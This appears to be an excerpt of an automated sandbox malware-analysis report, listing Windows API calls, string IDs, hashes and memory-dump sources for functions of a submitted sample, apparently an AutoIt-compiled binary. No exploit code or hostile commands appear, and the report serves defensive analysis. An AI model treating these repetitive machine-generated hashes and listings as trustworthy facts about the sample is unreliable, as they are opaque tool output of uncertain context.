                                                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                          • String ID: 0
                                                                          • API String ID: 1441871840-4108050209
                                                                          • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                          • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                          Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          • API String ID: 3631882475-2268648507
                                                                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                          Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                          • SendMessageW.USER32 ref: 00471740
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                          • SendMessageW.USER32 ref: 0047184F
                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          • API String ID: 4116747274-0
                                                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                          Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                          • _wcslen.LIBCMT ref: 00461683
                                                                          • __swprintf.LIBCMT ref: 00461721
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                          • GetParent.USER32(?), ref: 004618C3
                                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                          • String ID: %s%u
                                                                          • API String ID: 1899580136-679674701
                                                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                          Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu$Sleep
                                                                          • String ID: 0
                                                                          • API String ID: 1196289194-4108050209
                                                                          • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                          • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                          Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                          • String ID: (
                                                                          • API String ID: 3300687185-3887548279
                                                                          • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                          • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                          Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 1976180769-4113822522
                                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                          Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                          • String ID:
                                                                          • API String ID: 461458858-0
                                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                          Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3969911579-0
                                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                          Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                          • String ID: 0
                                                                          • API String ID: 956284711-4108050209
                                                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                          Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 1965227024-3771769585
                                                                          • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                          • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                          Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_memmove_wcslen
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          • API String ID: 369157077-1007645807
                                                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                          Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
